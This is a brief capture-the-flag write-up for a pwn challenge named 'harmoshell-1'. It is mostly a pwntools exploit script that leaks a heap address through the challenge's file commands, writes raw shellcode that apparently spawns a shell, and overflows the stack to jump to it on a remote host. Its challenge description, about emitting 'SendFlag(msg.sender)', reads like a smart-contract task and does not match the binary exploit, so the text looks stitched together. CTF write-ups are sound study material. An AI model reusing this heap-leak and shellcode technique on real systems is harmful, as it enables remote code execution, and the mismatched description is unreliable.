harmoshell-1



WriteUp source

Published by team Venom

Challenge description

Your goal is to emit SendFlag(msg.sender)

Knowledge points tested

  • Uninitialized variable leading to a stack overflow

Solution approach

When echoing into a file that does not exist, the program writes data onto the stack, and an overly long input overflows it. The approach is to first leak a heap address, then jump to the heap to execute shellcode.

from pwn import *
context.log_level = 'debug'
p = remote("121.37.222.236", 9999)

# Helpers wrapping the shell commands offered by the challenge binary
def add(name):
    p.sendlineafter("$ ", "touch "+name)

def free(name):
    p.sendlineafter("$ ", "rm "+name)

def show(name):
    p.sendlineafter("$ ", "cat "+name)

def edit(name, content):
    p.sendlineafter("$ ", "echo > "+name)
    p.send(content)

add("aaa")
add("bbb")
add("ccc")
add("ddd")
free("aaa")
free("ccc")
add("a")
show("a")   # leaks a heap address
add("b")
shellcode = "\x01\x11\x06\xec\x22\xe8\x13\x04\x21\x02\xb7\x67\x69\x6e\x93\x87\xf7\x22\x23\x30\xf4\xfe\xb7\x77\x68\x10\x33\x48\x08\x01\x05\x08\x72\x08\xb3\x87\x07\x41\x93\x87\xf7\x32\x23\x32\xf4\xfe\x93\x07\x04\xfe\x01\x46\x81\x45\x3e\x85\x93\x08\xd0\x0d\x73\x00\x00\x00"
edit("b", shellcode)
# echo into a nonexistent file: overlong input overflows the stack
p.sendlineafter("$ ", "echo > e")
p.send("a"*312+p32(0x25f10))
p.interactive()